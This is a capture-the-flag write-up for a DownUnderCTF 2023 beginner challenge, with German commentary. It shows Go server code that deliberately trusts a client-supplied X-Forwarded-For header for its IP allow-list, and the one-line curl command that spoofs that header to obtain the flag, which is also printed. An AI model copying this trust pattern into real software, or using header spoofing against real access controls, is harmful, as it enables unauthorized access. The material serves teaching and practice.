Go Source:
```go
package main
import (
	"flag"
	"fmt"
	"log"
	"net"
	"net/http"
	"os"
	"strings"
	"time"
)
// port is the TCP port the HTTP server binds to; override it with -port.
var port = flag.Int("port", 8081, "The port to listen on")
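// trustedIP is the only client address that is allowed to read the flag.
const trustedIP = "31.33.33.7"

// clientIP derives the address the access check is performed against.
//
// It starts from the peer address of the TCP connection (r.RemoteAddr) and,
// when at least one X-Forwarded-For header is present, replaces it with the
// LAST entry of the LAST such header.
//
// SECURITY: X-Forwarded-For is written by whoever sends the request, not by
// the network. Honouring it unconditionally lets any client choose the
// address it is checked against, which is exactly the weakness this
// challenge is built around. A real deployment must only trust the header
// on connections that come from a known reverse proxy and must strip or
// ignore it otherwise. The behaviour is kept here on purpose; only the
// parsing is hardened.
func clientIP(r *http.Request) string {
	// net.SplitHostPort understands IPv6 literals such as "[::1]:1234";
	// a naive strings.Split(addr, ":")[0] would reduce those to "[".
	ip, _, err := net.SplitHostPort(r.RemoteAddr)
	if err != nil {
		// net/http always sets "host:port", so this only triggers for
		// hand-built requests without a port; use the value unchanged.
		ip = r.RemoteAddr
	}

	xff := r.Header.Values("X-Forwarded-For")
	if len(xff) == 0 {
		return ip
	}

	// Entries are comma-separated with optional whitespace; splitting on
	// "," and trimming accepts both "a, b" and "a,b", whereas splitting on
	// ", " silently rejected the latter.
	hops := strings.Split(xff[len(xff)-1], ",")
	return strings.TrimSpace(hops[len(hops)-1])
}

// main serves "/" on -port and returns the FLAG environment variable to
// requests whose (client-controlled, see clientIP) address equals trustedIP.
func main() {
	flag.Parse()

	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		ip := clientIP(r)
		if ip != trustedIP {
			http.Error(w, fmt.Sprintf("untrusted IP: %s", ip), http.StatusForbidden)
			return
		}
		// Write errors cannot be reported to the client any more; log them
		// instead of discarding them silently.
		if _, err := w.Write([]byte(os.Getenv("FLAG"))); err != nil {
			log.Printf("writing flag: %v", err)
		}
	})

	log.Printf("Listening on port %d", *port)
	// A nil Handler keeps using http.DefaultServeMux, as before; the header
	// timeout stops idle or slow clients from holding connections open.
	srv := &http.Server{
		Addr:              fmt.Sprintf(":%d", *port),
		ReadHeaderTimeout: 10 * time.Second,
	}
	log.Fatal(srv.ListenAndServe())
}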
```
Es ist ziemlich eindeutig, dass man seine IP-Adresse „spoofen“ soll, um die Flagge aus der Umgebungsvariable `FLAG` zu lesen. Echtes IP-Spoofing ist dafür nicht nötig: Der Server übernimmt als Client-Adresse den letzten Eintrag des letzten `X-Forwarded-For`-Headers, und diesen Header kann jeder Client selbst setzen.
Ein Stack-Overflow-Beitrag hilft dabei (kurz gefasst: Die Absender-IP einer TCP-Verbindung lässt sich mit curl nicht fälschen, wohl aber der Header `X-Forwarded-For`): https://stackoverflow.com/questions/5188584/how-can-i-spoof-the-sender-ip-address-using-curl
=> SOLVED
```bash
┌──(kali㉿kali)-[/ctf/DownUnderCTF 2023/beginner/static file server]
└─$ curl --header "X-Forwarded-For: 31.33.33.7" http://proxed.duc.tf:30019/
DUCTF{17_533m5_w3_f0rg07_70_pr0x}
```